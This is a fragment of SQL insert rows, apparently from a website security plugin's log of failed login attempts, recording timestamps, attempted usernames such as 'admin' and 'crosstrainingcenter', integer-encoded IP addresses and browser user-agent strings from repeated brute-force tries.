(100260, 1495489976.115695, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1936861289, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100259, 1495473240.468441, 1, 'loginFailInvalidUsername', 'notre', 0, 1495980045, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100258, 1495472562.870633, 1, 'loginFailInvalidUsername', 'outils', 0, 1729627112, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100257, 1495471953.538443, 1, 'loginFailValidUsername', 'admin', 1, 3237921028, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100256, 1495470988.786893, 1, 'loginFailInvalidUsername', 'notre', 0, 1833311020, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100255, 1495409637.751304, 1, 'loginFailValidUsername', 'admin', 1, 531267501, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100254, 1495409637.092013, 1, 'loginFailValidUsername', 'pablo', 3, 531267501, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100253, 1495409636.419797, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 531267501, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100252, 1495409635.759945, 1, 'loginFailValidUsername', 'julie', 2, 531267501, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100251, 1495409635.095922, 1, 'loginFailValidUsername', 'julie', 2, 531267501, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100250, 1495365040.503164, 1, 'loginFailInvalidUsername', 'outils', 0, 1741512757, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100249, 1495364451.694098, 1, 'loginFailValidUsername', 'admin', 1, 3586257058, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100248, 1495363943.738869, 1, 'loginFailInvalidUsername', 'notre', 0, 1168360410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100247, 1495362812.578523, 1, 'loginFailInvalidUsername', 'outils', 0, 3280140082, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100245, 1495362457.919151, 1, 'loginFailInvalidUsername', 'outils', 0, 3105930270, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100246, 1495362457.976073, 1, 'loginFailInvalidUsername', 'outils', 0, 3476728705, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100244, 1495361935.401969, 1, 'loginFailValidUsername', 'admin', 1, 3497114222, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100243, 1495361453.182408, 1, 'loginFailInvalidUsername', 'notre', 0, 598138358, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100242, 1495360892.791027, 1, 'loginFailInvalidUsername', 'outils', 0, 1119841390, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100241, 1495340881.295965, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1586073137, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100240, 1495271338.656350, 1, 'loginFailInvalidUsername', 'outils', 0, 3056768804, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100239, 1495260583.100693, 1, 'loginFailValidUsername', 'admin', 1, 3497113622, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100238, 1495260232.935197, 1, 'loginFailInvalidUsername', 'notre', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100237, 1495259647.512984, 1, 'loginFailInvalidUsername', 'outils', 0, 1053969232, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100236, 1495258796.362682, 1, 'loginFailValidUsername', 'admin', 1, 1168360410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100235, 1495190438.042588, 1, 'loginFailValidUsername', 'admin', 1, 407574776, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100234, 1495190436.938204, 1, 'loginFailValidUsername', 'pablo', 3, 407574776, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100233, 1495190435.476249, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 407574776, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100232, 1495190434.158841, 1, 'loginFailValidUsername', 'julie', 2, 407574776, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100231, 1495190432.892130, 1, 'loginFailValidUsername', 'julie', 2, 407574776, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100230, 1495186790.323761, 1, 'loginFailValidUsername', 'admin', 1, 1434732386, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100229, 1495160513.507993, 1, 'loginFailValidUsername', 'admin', 1, 1539837019, 'Mozilla/5.0 (Windows NT 5.0; rv:52.54.01) Gecko/20142235 Firefox/52.54.01'),
(100228, 1495154264.888311, 1, 'loginFailValidUsername', 'admin', 1, 1539837019, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_23_85; rv:45.74.27) Gecko/20138607 Firefox/45.74.27'),
(100227, 1495148202.919062, 1, 'loginFailValidUsername', 'admin', 1, 1539837019, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.78.21) Gecko/20189638 Firefox/45.78.21'),
(100226, 1495096161.343910, 1, 'loginFailValidUsername', 'julie', 2, 3059525007, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100225, 1494974514.010111, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2970865452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(100224, 1494974512.621905, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2970865452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(100223, 1494973799.684300, 1, 'loginFailValidUsername', 'admin', 1, 3107039609, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100222, 1494888245.317491, 1, 'loginFailValidUsername', 'admin', 1, 95598307, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100221, 1494885335.727474, 1, 'loginFailValidUsername', 'julie', 2, 872392488, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100220, 1494856727.263816, 1, 'loginFailValidUsername', 'julie', 2, 3332038879, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100219, 1494839680.445506, 1, 'loginFailValidUsername', 'julie', 2, 1833429877, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100218, 1494829488.891922, 1, 'loginFailValidUsername', 'admin', 1, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100217, 1494828586.240561, 1, 'loginFailInvalidUsername', 'testing', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100216, 1494828584.261604, 1, 'loginFailValidUsername', 'admin', 1, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99313, 1492882387.583650, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1410971013, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99312, 1492882386.610344, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1410971013, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99311, 1492881242.207047, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2170867155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99310, 1492881240.995681, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2170867155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99309, 1492879556.387142, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 784925211, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99308, 1492879555.177611, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 784925211, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99307, 1492879059.402398, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2835369459, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99306, 1492879056.565554, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2835369459, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99305, 1492874124.493678, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1066387086, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99304, 1492871360.516474, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3047364473, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99303, 1492871359.093938, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3047364473, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99302, 1492869604.164033, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835553714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99301, 1492864933.739667, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2631677661, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99300, 1492864932.299806, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2631677661, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99299, 1492863295.957793, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3418421947, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99298, 1492863294.782557, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3418421947, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99297, 1492863017.304037, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 627635047, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99296, 1492862199.103098, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3411509662, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99295, 1492862197.510862, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3411509662, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99294, 1492862126.228543, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1092736186, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99293, 1492862125.090797, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1092736186, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99292, 1492859206.326496, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2015149832, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99291, 1492859203.994163, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2015149826, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99290, 1492853978.310291, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3573333361, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99289, 1492853977.268088, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3573333361, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99288, 1492851898.034808, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 831654908, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99287, 1492851896.421933, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 831654908, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99286, 1492850840.273706, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3075697672, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99285, 1492850838.799261, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3075697672, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99284, 1492848356.736915, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1483800238, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99283, 1492847042.602013, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 989904714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99282, 1492847040.834512, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 989904714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99281, 1492846222.884101, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741894664, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99280, 1492844337.938960, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 656969883, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99279, 1492844336.607330, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 656969883, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99278, 1492840903.021633, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 656634353, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99277, 1492834155.316643, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3356055950, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99276, 1492830946.434149, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3081456248, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99275, 1492825875.060991, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 531122319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99274, 1492825873.616555, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 531122319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99273, 1492821860.341696, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3075962410, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99272, 1492821858.958019, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3075962410, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99271, 1492818135.339360, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2704623375, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99270, 1492818134.375360, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2704623375, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99269, 1492807964.769873, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1705318576, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99268, 1492807962.954410, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1705318576, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99267, 1492807590.417119, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835662335, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99266, 1492807589.237220, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835662335, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99265, 1492802345.065609, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1372304315, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99264, 1492801813.763225, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3452436806, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99263, 1492800728.185220, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1014432263, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99262, 1492800726.581185, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1014432263, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99261, 1492797341.388229, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2954598475, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99260, 1492797340.326307, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2954598475, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99259, 1492795400.466536, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2015196739, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99258, 1492793737.033132, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1571925341, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99257, 1492793733.721767, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1571925341, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99256, 1492793232.508870, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 531877122, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99255, 1492793231.127808, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 531877122, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99254, 1492792509.867075, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3573226350, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99253, 1492792508.647512, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3573226350, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99252, 1492791695.070682, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1050879178, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99251, 1492788356.376939, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1513284388, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99250, 1492788355.313714, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1513284388, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99249, 1492787817.007719, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1489588377, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99248, 1492787815.540170, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1489588377, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99247, 1492783288.946626, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741825768, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99246, 1492783287.633197, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741825768, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99245, 1492777373.979524, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3065529464, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99244, 1492777372.550357, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3065529464, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99243, 1492776735.566521, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1729276347, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99242, 1492776659.218566, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3075658538, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99241, 1492773101.896052, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 18290519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99240, 1492773099.987908, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 18290519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99239, 1492768917.150578, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3314823674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99238, 1492768914.065516, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3314823674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99237, 1492767440.832306, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2945057184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99236, 1492767439.109568, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2945057184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99235, 1492764412.678026, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3648684353, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99234, 1492764411.677851, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3648684353, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99233, 1492763119.773354, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 656718336, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99232, 1492761735.360450, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1331015039, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99231, 1492761461.931055, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 34273040, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99230, 1492761460.854856, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 34273040, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99229, 1492757744.483128, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 93188037, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99228, 1492757743.391426, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 93188037, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99227, 1492757136.349958, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2946418959, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99226, 1492757134.701299, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2946418959, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99225, 1492756121.818400, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1897363733, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99224, 1492755643.529418, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976518279, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99223, 1492750803.789395, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 831852610, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99222, 1492750802.039759, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 831852610, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99221, 1492745504.121040, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1311451404, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99220, 1492742066.650724, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2807568394, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
